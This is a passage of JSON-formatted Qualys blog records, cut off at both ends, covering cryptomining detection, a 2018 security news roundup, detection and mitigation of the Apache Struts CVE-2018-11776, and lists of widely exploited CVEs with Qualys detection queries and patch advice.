BrowserCheck CoinBlocker Detection Logs_\n\n \n\nQualys BrowserCheck CoinBlocker Extension relies not only on the domain blacklist but also uses heuristics to identify underlying cryptomining algorithms like CryptoNight (used for mining Monero) and its various artifacts.\n\n### Detecting Traditional Cryptomining Threats\n\nAdditionally, cryptomining is not just limited to browser-based scripts as we have seen certain attackers infect systems with a persistent malware that runs outside of a browser to perform cryptomining. To help detect such malware, security professionals can use [Qualys Indication of Compromise](<https://www.qualys.com/apps/indication-of-compromise/>) (IOC) solution to gain 2-second visibility into coin mining and other malware across their entire organization. Qualys IOC includes behaviour-based malware family detection for the following coin mining threats:\n\n * CryptoMinerA\n * CryptoMinerB\n * CryptoMinerC\n * CryptoMinerD\n * CryptoMinerE\n * Neksminer\n\nCryptomining is a rising online threat that is expected to grow as digital currencies and blockchain technologies are getting wider acceptance. Attacker are employing various techniques to use unsuspecting users' systems for malicious purposes. We advise our users to regularly scan systems for vulnerabilities using tools like [Qualys BrowserCheck](<https://browsercheck.qualys.com/>). Stay protected online from crypto-mining attacks with [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension.", "cvss3": {}, "published": "2018-07-25T17:00:02", "type": "qualysblog", "title": "Staying Safe in the Era of Browser-based Cryptocurrency Mining", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-07-25T17:00:02", "id": "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "href": "https://blog.qualys.com/technology/2018/07/25/staying-safe-in-the-era-of-browser-based-cryptocurrency-mining", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). Detection requires authenticated scanning or a[ Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account in which they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\n\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019[ Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman makes a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of \u201cbcrypt\u201d hashing function) and not so well (use of SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was[ quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows OS vulnerabilities that Microsoft patched in March 2017, so more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute remote code in affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### \n\n \n\n\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal [warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. \n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious[ ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "cvss3": {}, "published": "2018-04-02T18:02:51", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-1038", "CVE-2018-7600"], "modified": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-14T20:46:20", "description": "A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions 2.3.34 and 2.5.16 and before are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to programmatically detect with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n * **Authenticated (Linux/Unix)** - This executes ps -ef command, looks for the presence of the Tomcat process and finds the location of struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat auth to specify the location of the Tomcat configuration file. Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for struts-core.x.jar file under sub directories. It extracts the version from .jar file and compares with vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every possible out-of-the-box template and generic policy. These templates, developed by security experts for Qualys WAF programmable inspection engine, are constantly tested against latests threats for the best detection rate and least false-positives.\n\n\n\nCustomers using manual policies instead of templates were potentially not protected though, depending on ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) sliders settings, along with the blocking threshold.\n\n\n\n\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or of course, by applying a **virtual patch** to QID-150250 from within the WAS module ; which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF, without needing to define manual rules, giving CISO and IT Security organizations time for implementing sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the vulnerability.", "cvss3": {}, "published": "2018-08-23T20:27:19", "type": "qualysblog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-7600"], "modified": "2018-08-23T20:27:19", "id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-27T19:32:53", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", 